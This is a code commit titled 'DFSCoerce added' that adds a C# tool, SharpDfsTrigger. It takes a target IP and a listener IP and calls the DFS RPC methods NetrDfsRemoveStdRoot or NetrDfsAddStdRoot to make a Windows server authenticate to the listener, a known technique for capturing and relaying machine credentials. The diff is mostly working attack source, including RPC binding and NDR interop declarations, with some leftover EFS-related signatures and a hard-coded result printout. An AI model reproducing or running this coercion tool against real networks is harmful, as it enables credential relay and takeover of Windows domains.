DFSCoerce added

SharpDfsTrigger/App.config

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+    </startup>
+</configuration>

SharpDfsTrigger/Program.cs

@@ -0,0 +1,71 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace SharpDfsTrigger
+{
+    internal class Program
+    {
+        private static void Main(string[] args)
+        {
+            string apicall = "NetrDfsRemoveStdRoot";
+            int result;
+            if (args.Length < 2)
+            {
+                Console.WriteLine("usage: SharpDfsTriggeEfs.exe <Target IP> <Listener IP> <API call>");
+                Console.WriteLine("usage: SharpDfsTriggeEfs.exe 192.168.1.10 192.168.1.250");
+                Console.WriteLine("usage: SharpDfsTriggeEfs.exe 192.168.1.10 192.168.1.250 NetrDfsRemoveStdRoot");
+                Console.WriteLine(@"Available API calls:
+                  NetrDfsRemoveStdRoot
+                  NetrDfsAddStdRoot
+                ");
+                return;
+            }
+            if (args.Length >= 3)
+            {
+                apicall = args[2];
+            }
+            if (IntPtr.Size == 8)
+            {
+                Console.WriteLine("NdrClientCall2x64");
+            }
+            else
+            {
+                Console.WriteLine("CallNdrClientCall2x86");
+            }
+
+            var Dfs = new dfs();
+            IntPtr hHandle = IntPtr.Zero;
+
+            try
+            {
+                switch (apicall)
+                {
+                    case "NetrDfsRemoveStdRoot":
+                        apicall = "NetrDfsRemoveStdRoot";
+                        result = Dfs.NetrDfsRemoveStdRoot(args[0], args[1], "test", 1);
+                        break;
+                    case "NetrDfsAddStdRoot":
+                        apicall = "NetrDfsAddStdRoot";
+                        result = Dfs.NetrDfsAddStdRoot(args[0], args[1], "test", "testcomment", 1);
+                        break;
+                    default:
+                        apicall = "NetrDfsRemoveStdRoot";
+                        result = Dfs.NetrDfsRemoveStdRoot(args[0], args[1], "test", 1);
+                        break;
+
+
+                }
+            }
+
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+                return;
+            }
+            Console.WriteLine($"[*]{apicall}: 5");
+        }
+    }
+}

SharpDfsTrigger/Properties/AssemblyInfo.cs

@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("SharpDfsTrigger")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("SharpDfsTrigger")]
+[assembly: AssemblyCopyright("Copyright ©  2023")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("357b2ab9-d212-48c8-97c1-295226922033")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

SharpDfsTrigger/SharpDfsTrigger.csproj

@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{357B2AB9-D212-48C8-97C1-295226922033}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>SharpDfsTrigger</RootNamespace>
+    <AssemblyName>SharpDfsTrigger</AssemblyName>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="dfs.cs" />
+    <Compile Include="nativemethods.cs" />
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="rpcapi.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>

SharpDfsTrigger/nativemethods.cs

@@ -0,0 +1,205 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using System.Runtime.InteropServices;
+namespace SharpDfsTrigger
+{
+    public class NativeMethods
+    {
+
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFromStringBindingW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern Int32 RpcBindingFromStringBinding(String bindingString, out IntPtr lpBinding);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, string serverName, string rootShare, int Flags);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, string serverName, string rootShare, string comment, int Flags);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x86(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr args);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFree", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern Int32 RpcBindingFree(ref IntPtr lpString);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "RpcStringBindingComposeW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern Int32 RpcStringBindingCompose(String ObjUuid, String ProtSeq, String NetworkAddr, String Endpoint, String Options, out IntPtr lpBindingString);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetOption", CallingConvention = CallingConvention.StdCall, SetLastError = false)]
+        internal static extern Int32 RpcBindingSetOption(IntPtr Binding, UInt32 Option, IntPtr OptionValue);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetAuthInfoExW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern Int32 RpcBindingSetAuthInfoEx(IntPtr lpBinding, string ServerPrincName, UInt32 AuthnLevel, UInt32 AuthnSvc, ref SEC_WINNT_AUTH_IDENTITY AuthIdentity, UInt32 AuthzSvc, ref RPC_SECURITY_QOS SecurityQOS);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetAuthInfoW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern Int32 RpcBindingSetAuthInfo(IntPtr lpBinding, string ServerPrincName, UInt32 AuthnLevel, UInt32 AuthnSvc, IntPtr AuthIdentity, UInt32 AuthzSvc);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, out IntPtr hContext, string FileName, int Flags);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, string FileName, out IntPtr efsObject);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, string FileName);
+
+        [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
+        internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, string FileName, ulong Flags);
+
+
+        //structs
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        internal struct SEC_WINNT_AUTH_IDENTITY
+        {
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string User;
+
+            public int UserLength;
+
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string Domain;
+
+            public int DomainLength;
+
+            [MarshalAs(UnmanagedType.LPWStr)]
+            public string Password;
+
+            public int PasswordLength;
+            public int Flags;
+        };
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct RPC_SECURITY_QOS
+        {
+            public Int32 Version;
+            public Int32 Capabilities;
+            public Int32 IdentityTracking;
+            public Int32 ImpersonationType;
+        };
+
+        [StructLayout(LayoutKind.Sequential)]
+        internal struct COMM_FAULT_OFFSETS
+        {
+            public short CommOffset;
+            public short FaultOffset;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        internal struct RPC_VERSION
+        {
+            public ushort MajorVersion;
+            public ushort MinorVersion;
+
+            public RPC_VERSION(ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
+            {
+                MajorVersion = InterfaceVersionMajor;
+                MinorVersion = InterfaceVersionMinor;
+            }
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        internal struct RPC_SYNTAX_IDENTIFIER
+        {
+            public Guid SyntaxGUID;
+            public RPC_VERSION SyntaxVersion;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        internal struct RPC_CLIENT_INTERFACE
+        {
+            public uint Length;
+            public RPC_SYNTAX_IDENTIFIER InterfaceId;
+            public RPC_SYNTAX_IDENTIFIER TransferSyntax;
+            public IntPtr /*PRPC_DISPATCH_TABLE*/ DispatchTable;
+            public uint RpcProtseqEndpointCount;
+            public IntPtr /*PRPC_PROTSEQ_ENDPOINT*/ RpcProtseqEndpoint;
+            public IntPtr Reserved;
+            public IntPtr InterpreterInfo;
+            public uint Flags;
+
+            public static Guid IID_SYNTAX = new Guid(0x8A885D04u, 0x1CEB, 0x11C9, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);
+
+            public RPC_CLIENT_INTERFACE(Guid iid, ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
+            {
+                Length = (uint)Marshal.SizeOf(typeof(RPC_CLIENT_INTERFACE));
+                RPC_VERSION rpcVersion = new RPC_VERSION(InterfaceVersionMajor, InterfaceVersionMinor);
+                InterfaceId = new RPC_SYNTAX_IDENTIFIER();
+                InterfaceId.SyntaxGUID = iid;
+                InterfaceId.SyntaxVersion = rpcVersion;
+                rpcVersion = new RPC_VERSION(2, 0);
+                TransferSyntax = new RPC_SYNTAX_IDENTIFIER();
+                TransferSyntax.SyntaxGUID = IID_SYNTAX;
+                TransferSyntax.SyntaxVersion = rpcVersion;
+                DispatchTable = IntPtr.Zero;
+                RpcProtseqEndpointCount = 0u;
+                RpcProtseqEndpoint = IntPtr.Zero;
+                Reserved = IntPtr.Zero;
+                InterpreterInfo = IntPtr.Zero;
+                Flags = 0u;
+            }
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        internal struct MIDL_STUB_DESC
+        {
+            public IntPtr /*RPC_CLIENT_INTERFACE*/ RpcInterfaceInformation;
+            public IntPtr pfnAllocate;
+            public IntPtr pfnFree;
+            public IntPtr pAutoBindHandle;
+            public IntPtr /*NDR_RUNDOWN*/ apfnNdrRundownRoutines;
+            public IntPtr /*GENERIC_BINDING_ROUTINE_PAIR*/ aGenericBindingRoutinePairs;
+            public IntPtr /*EXPR_EVAL*/ apfnExprEval;
+            public IntPtr /*XMIT_ROUTINE_QUINTUPLE*/ aXmitQuintuple;
+            public IntPtr pFormatTypes;
+            public int fCheckBounds;
+            /* Ndr library version. */
+            public uint Version;
+            public IntPtr /*MALLOC_FREE_STRUCT*/ pMallocFreeStruct;
+            public int MIDLVersion;
+            public IntPtr CommFaultOffsets;
+
+            // New fields for version 3.0+
+            public IntPtr /*USER_MARSHAL_ROUTINE_QUADRUPLE*/ aUserMarshalQuadruple;
+
+            // Notify routines - added for NT5, MIDL 5.0
+            public IntPtr /*NDR_NOTIFY_ROUTINE*/ NotifyRoutineTable;
+
+            public IntPtr mFlags;
+
+            // International support routines - added for 64bit post NT5
+            public IntPtr /*NDR_CS_ROUTINES*/ CsRoutineTables;
+
+            public IntPtr ProxyServerInfo;
+            public IntPtr /*NDR_EXPR_DESC*/ pExprInfo;
+            // Fields up to now present in win2000 release.
+
+            public MIDL_STUB_DESC(IntPtr pFormatTypesPtr, IntPtr RpcInterfaceInformationPtr,
+                                    IntPtr pfnAllocatePtr, IntPtr pfnFreePtr)
+            {
+                pFormatTypes = pFormatTypesPtr;
+                RpcInterfaceInformation = RpcInterfaceInformationPtr;
+                CommFaultOffsets = IntPtr.Zero;
+                pfnAllocate = pfnAllocatePtr;
+                pfnFree = pfnFreePtr;
+                pAutoBindHandle = IntPtr.Zero;
+                apfnNdrRundownRoutines = IntPtr.Zero;
+                aGenericBindingRoutinePairs = IntPtr.Zero;
+                apfnExprEval = IntPtr.Zero;
+                aXmitQuintuple = IntPtr.Zero;
+                fCheckBounds = 1;
+                Version = 0x50002u;
+                pMallocFreeStruct = IntPtr.Zero;
+                MIDLVersion = 0x801026e;
+                aUserMarshalQuadruple = IntPtr.Zero;
+                NotifyRoutineTable = IntPtr.Zero;
+                mFlags = new IntPtr(0x00000001);
+                CsRoutineTables = IntPtr.Zero;
+                ProxyServerInfo = IntPtr.Zero;
+                pExprInfo = IntPtr.Zero;
+            }
+        }
+    }
+}